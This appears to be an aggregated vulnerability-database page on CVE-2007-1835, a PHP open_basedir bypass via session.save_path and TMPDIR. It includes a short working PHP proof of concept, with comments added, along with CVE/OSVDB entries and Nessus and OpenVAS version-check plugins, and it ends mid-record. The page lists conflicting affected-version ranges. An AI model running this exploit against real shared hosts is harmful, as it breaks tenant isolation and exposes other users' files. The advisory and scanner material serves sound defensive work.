ID EDB-ID:29801 Type exploitdb Reporter Stefan Esser Modified 2007-03-28T00:00:00
Description
PHP 5.2.1 Session.Save_Path() TMPDIR Open_Basedir Restriction Bypass Vulnerability. CVE-2007-1835. Local exploit for php platform
source: http://www.securityfocus.com/bid/23183/info
PHP is prone to an 'open_basedir' restriction-bypass vulnerability due to a design error.
Successful exploits could allow an attacker to access sensitive information or to write files in unauthorized locations.
This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other.
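The following versions are vulnerable according to this advisory (the CVE-2007-1835 record further down this page instead states PHP 4 before 4.4.5 and PHP 5 before 5.2.1, and the scanner plugins listed there treat 4.4.5 and 5.2.1 as fixed, so confirm the fixed release against the vendor changelog before relying on a version check):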
PHP 4 up to and including 4.4.6
PHP 5 up to and including 5.2.1
<?php
// Proof of concept for CVE-2007-1835 (open_basedir bypass via session.save_path).
// Per the CVE record on this page, affected builds fall back to the TMPDIR
// default for an empty session.save_path only *after* the restriction check
// has run, so the directory that is finally used is never validated.
// "/sessions/user2/" stands for a directory outside the calling script's
// open_basedir, e.g. another tenant's session directory on a shared host.

// Explicit path: this is the value the restriction check actually sees.
// NOTE(review): presumably rejected when open_basedir is enforced and shown
// here for contrast; the page does not state the outcome of this call.
ini_set("session.save_path", "/sessions/user2/");
// The script controls its own environment, so it can choose the directory the
// session code will later pick up as the TMPDIR default.
putenv("TMPDIR=/sessions/user2/");
// An empty save path carries no directory to check; the TMPDIR fallback is
// applied afterwards (the check-then-use gap described in the CVE record).
ini_set("session.save_path", "");
// Starting the session is the step that uses the fallback directory; '@'
// suppresses any warning output.
@session_start();
// Hardening / review notes: upgrade to a release that fixes CVE-2007-1835;
// on shared hosts, consider pinning a non-empty per-tenant session.save_path
// at the administrator level (e.g. php_admin_value) and adding putenv to
// disable_functions. In code review, a putenv() of TMPDIR followed by an
// empty session.save_path is the pattern to flag.
?>
{"id": "EDB-ID:29801", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PHP <= 5.2.1 Session.Save_Path TMPDIR Open_Basedir Restriction Bypass Vulnerability", "description": "PHP 5.2.1 Session.Save_Path() TMPDIR Open_Basedir Restriction Bypass Vulnerability. CVE-2007-1835. Local exploit for php platform", "published": "2007-03-28T00:00:00", "modified": "2007-03-28T00:00:00", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/29801/", "reporter": "Stefan Esser", "references": [], "cvelist": ["CVE-2007-1835"], "lastseen": "2016-02-03T11:09:31", "viewCount": 105, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2016-02-03T11:09:31", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1835"]}, {"type": "osvdb", "idList": ["OSVDB:33953"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7513"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310110174", "OPENVAS:1361412562310110175"]}, {"type": "nessus", "idList": ["PHP_4_4_5.NASL", "PHP_5_2_1.NASL"]}], "modified": "2016-02-03T11:09:31", "rev": 2}, "vulnersScore": 6.2}, "sourceHref": "https://www.exploit-db.com/download/29801/", "sourceData": "source: http://www.securityfocus.com/bid/23183/info\r\n\r\nPHP is prone to a 'open_basedir' restriction-bypass vulnerability due to a design error.\r\n\r\nSuccessful exploits could allow an attacker to access sensitive information or to write files in unauthorized locations.\r\n\r\nThis vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other.\r\n\r\nThe following versions are vulnerable:\r\n\r\nPHP 4 up to and including 4.4.6\r\nPHP 5 up to and including 5.2.1 \r\n\r\n<?php\r\n ini_set(\"session.save_path\", \"/sessions/user2/\");\r\n 
putenv(\"TMPDIR=/sessions/user2/\");\r\n ini_set(\"session.save_path\", \"\");\r\n @session_start();\r\n?>", "osvdbidlist": ["33953"]}
{"cve": [{"lastseen": "2020-10-03T11:45:50", "description": "PHP 4 before 4.4.5 and PHP 5 before 5.2.1, when using an empty session save path (session.save_path), uses the TMPDIR default after checking the restrictions, which allows local users to bypass open_basedir restrictions.", "edition": 3, "cvss3": {}, "published": "2007-04-03T00:19:00", "title": "CVE-2007-1835", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1835"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.0", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:4.0", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:4.2", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.0.5", 
"cpe:/a:php:php:4.2.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:4.0.6"], "id": "CVE-2007-1835", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1835", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2:*:dev:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", 
"cpe:2.3:a:php:php:4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-1835"], "description": "## Vulnerability Description\nPHP contains a flaw that may allow an attacker to bypass security restrictions. The issue is due to an empty session save path (session.save_path) using the TMPDIR default after checking security restrictions. 
This may allow a local uesr to bypass the open_basedir security restriction.\n## Short Description\nPHP contains a flaw that may allow an attacker to bypass security restrictions. The issue is due to an empty session save path (session.save_path) using the TMPDIR default after checking security restrictions. This may allow a local uesr to bypass the open_basedir security restriction.\n## References:\nVendor URL: http://www.php.net/\n[Vendor Specific Advisory URL](http://www8.itrc.hp.com/service/cki/docDisplay.do?docId=c01056506)\n[Secunia Advisory ID:25850](https://secuniaresearch.flexerasoftware.com/advisories/25850/)\n[Secunia Advisory ID:25423](https://secuniaresearch.flexerasoftware.com/advisories/25423/)\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-36-2007.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0363.html\nKeyword: HPSBTU02232,SSRT071429\nKeyword: HPSBMA02215,SSRT071423\nKeyword: HPSBTU02232,SSRT071429,c01086137\n[CVE-2007-1835](https://vulners.com/cve/CVE-2007-1835)\nBugtraq ID: 23183\n", "edition": 1, "modified": "2007-03-28T16:41:14", "published": "2007-03-28T16:41:14", "href": "https://vulners.com/osvdb/OSVDB:33953", "id": "OSVDB:33953", "title": "PHP session.save_path open_basedir Restriction Bypass", "type": "osvdb", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "cvelist": ["CVE-2007-1835"], "description": "It's possible to create file in any directory by using environment variables.", "edition": 1, "modified": "2007-03-31T00:00:00", "published": "2007-03-31T00:00:00", "id": "SECURITYVULNS:VULN:7513", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7513", "title": "PHP session.save_path open_basedir protection bypass", "type": "securityvulns", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": 
"2021-01-01T04:54:21", "description": "According to its banner, the version of PHP installed on the remote\nhost is older than 4.4.5. Such versions may be affected by several\nissues, including buffer overflows, format string vulnerabilities,\narbitrary code execution, 'safe_mode' and 'open_basedir' bypasses, and\nclobbering of super-globals.", "edition": 25, "published": "2007-04-02T00:00:00", "title": "PHP < 4.4.5 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1701", "CVE-2007-1890", "CVE-2007-1885", "CVE-2007-1379", "CVE-2007-1835", "CVE-2007-1886", "CVE-2007-0907", "CVE-2007-0909", "CVE-2006-4625", "CVE-2007-1825", "CVE-2007-1884", "CVE-2007-0910", "CVE-2007-0988", "CVE-2007-1286", "CVE-2007-1887", "CVE-2007-1376", "CVE-2007-1380", "CVE-2007-0905", "CVE-2007-1378", "CVE-2007-1700", "CVE-2007-0906", "CVE-2007-1777", "CVE-2007-0908"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_4_4_5.NASL", "href": "https://www.tenable.com/plugins/nessus/24906", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24906);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\n \"CVE-2006-4625\",\n \"CVE-2007-0905\",\n \"CVE-2007-0906\",\n \"CVE-2007-0907\",\n \"CVE-2007-0908\",\n \"CVE-2007-0909\",\n \"CVE-2007-0910\",\n \"CVE-2007-0988\",\n \"CVE-2007-1286\",\n \"CVE-2007-1376\",\n \"CVE-2007-1378\",\n \"CVE-2007-1379\",\n \"CVE-2007-1380\",\n \"CVE-2007-1700\",\n \"CVE-2007-1701\",\n \"CVE-2007-1777\",\n \"CVE-2007-1825\",\n \"CVE-2007-1835\",\n \"CVE-2007-1884\",\n \"CVE-2007-1885\",\n \"CVE-2007-1886\",\n \"CVE-2007-1887\",\n \"CVE-2007-1890\"\n );\n script_bugtraq_id(\n 22496, \n 22805, \n 22806, \n 22833, \n 22862,\n 23119, \n 23120, \n 23169, \n 23219,\n 23233, \n 23234, \n 23235,\n 23236\n );\n\n script_name(english:\"PHP < 4.4.5 Multiple 
Vulnerabilities\");\n script_summary(english:\"Checks version of PHP\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of PHP installed on the remote\nhost is older than 4.4.5. Such versions may be affected by several\nissues, including buffer overflows, format string vulnerabilities,\narbitrary code execution, 'safe_mode' and 'open_basedir' bypasses, and\nclobbering of super-globals.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/releases/4_4_5.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 4.4.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/02\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n 
exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^3\\.\" ||\n version =~ \"^4\\.[0-3]\\.\" ||\n version =~ \"^4\\.4\\.[0-4]($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 4.4.5\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:54:22", "description": "According to its banner, the version of PHP installed on the remote\nhost is older than 5.2.1. 
Such versions may be affected by several\nissues, including buffer overflows, format string vulnerabilities,\narbitrary code execution, 'safe_mode' and 'open_basedir' bypasses, and\nclobbering of super-globals.", "edition": 25, "published": "2007-04-02T00:00:00", "title": "PHP < 5.2.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6383", "CVE-2007-1701", "CVE-2007-1452", "CVE-2007-1890", "CVE-2007-1454", "CVE-2007-1885", "CVE-2007-1835", "CVE-2007-1886", "CVE-2007-0907", "CVE-2007-1824", "CVE-2007-1453", "CVE-2007-4586", "CVE-2007-0909", "CVE-2007-4441", "CVE-2007-1825", "CVE-2007-1884", "CVE-2007-0910", "CVE-2007-1383", "CVE-2007-0988", "CVE-2007-1887", "CVE-2007-1376", "CVE-2007-1889", "CVE-2007-1380", "CVE-2007-0905", "CVE-2007-1700", "CVE-2007-0906", "CVE-2007-0908"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_2_1.NASL", "href": "https://www.tenable.com/plugins/nessus/24907", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24907);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\n \"CVE-2006-6383\",\n \"CVE-2007-0905\",\n \"CVE-2007-0906\",\n \"CVE-2007-0907\",\n \"CVE-2007-0908\",\n \"CVE-2007-0909\",\n \"CVE-2007-0910\",\n \"CVE-2007-0988\",\n \"CVE-2007-1376\",\n \"CVE-2007-1380\",\n \"CVE-2007-1383\",\n \"CVE-2007-1452\",\n \"CVE-2007-1453\",\n \"CVE-2007-1454\",\n \"CVE-2007-1700\",\n \"CVE-2007-1701\",\n \"CVE-2007-1824\",\n \"CVE-2007-1825\",\n \"CVE-2007-1835\",\n \"CVE-2007-1884\",\n \"CVE-2007-1885\",\n \"CVE-2007-1886\",\n \"CVE-2007-1887\",\n \"CVE-2007-1889\",\n \"CVE-2007-1890\",\n \"CVE-2007-4441\",\n \"CVE-2007-4586\"\n );\n script_bugtraq_id(\n 21508, \n 22496, \n 22805,\n 22806,\n 22862,\n 22922,\n 23119,\n 23120,\n 23219,\n 23233, \n 23234, \n 23235, \n 23236, \n 23237, \n 23238\n );\n\n 
script_name(english:\"PHP < 5.2.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of PHP\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of PHP installed on the remote\nhost is older than 5.2.1. Such versions may be affected by several\nissues, including buffer overflows, format string vulnerabilities,\narbitrary code execution, 'safe_mode' and 'open_basedir' bypasses, and\nclobbering of super-globals.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/releases/5_2_1.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.2.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 119, 189, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n 
exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^5\\.[01]\\.\" || \n version =~ \"^5\\.2\\.0($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 5.2.1\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:32:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1701", "CVE-2007-1890", "CVE-2007-1885", "CVE-2007-1379", "CVE-2007-1835", "CVE-2007-1886", "CVE-2007-0907", "CVE-2007-0909", "CVE-2006-4625", "CVE-2007-1825", "CVE-2007-1884", "CVE-2007-0910", "CVE-2007-0988", "CVE-2007-1286", "CVE-2007-1887", "CVE-2007-1376", "CVE-2007-1380", "CVE-2007-0905", "CVE-2007-1378", "CVE-2007-1700", "CVE-2007-0906", "CVE-2007-1777", "CVE-2007-0908"], "description": "PHP version smaller than 4.4.5 suffers from multiple vulnerabilities.", "modified": "2018-07-09T00:00:00", "published": "2012-06-21T00:00:00", "id": "OPENVAS:1361412562310110174", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310110174", "type": "openvas", "title": "PHP Version < 4.4.5 Multiple Vulnerabilities", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nopsec_php_4_4_5.nasl 10460 2018-07-09 07:50:03Z cfischer $\n#\n# PHP Version < 
4.4.5 Multiple Vulnerabilities\n#\n# Authors:\n# Songhan Yu <syu@nopsec.com>\n#\n# Copyright:\n# Copyright NopSec Inc. 2012, http://www.nopsec.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.110174\");\n script_version(\"$Revision: 10460 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-09 09:50:03 +0200 (Mon, 09 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2006-4625\", \"CVE-2007-0905\", \"CVE-2007-0906\", \"CVE-2007-0907\",\n \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\",\n \"CVE-2007-1286\", \"CVE-2007-1376\", \"CVE-2007-1378\", \"CVE-2007-1379\",\n \"CVE-2007-1380\", \"CVE-2007-1700\", \"CVE-2007-1701\", \"CVE-2007-1777\",\n \"CVE-2007-1825\", \"CVE-2007-1835\", \"CVE-2007-1884\", \"CVE-2007-1885\",\n \"CVE-2007-1886\", \"CVE-2007-1887\", \"CVE-2007-1890\");\n script_bugtraq_id(22496, 22805, 22806, 22833, 22862, 23119, 23120, 23169, 23219,\n 23233, 23234, 23235, 23236);\n script_name(\"PHP Version < 4.4.5 Multiple 
Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright NopSec Inc. 2012\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\");\n\n script_tag(name:\"solution\", value:\"Update PHP to version 4.4.5 or later.\");\n\n script_tag(name:\"summary\", value:\"PHP version smaller than 4.4.5 suffers from multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"4.4.5\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.4.5\" );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6383", "CVE-2007-1701", "CVE-2007-1452", "CVE-2007-1890", "CVE-2007-1454", "CVE-2007-1885", "CVE-2007-1835", "CVE-2007-1886", "CVE-2007-0907", "CVE-2007-1824", "CVE-2007-1453", "CVE-2007-4586", "CVE-2007-0909", "CVE-2007-4441", 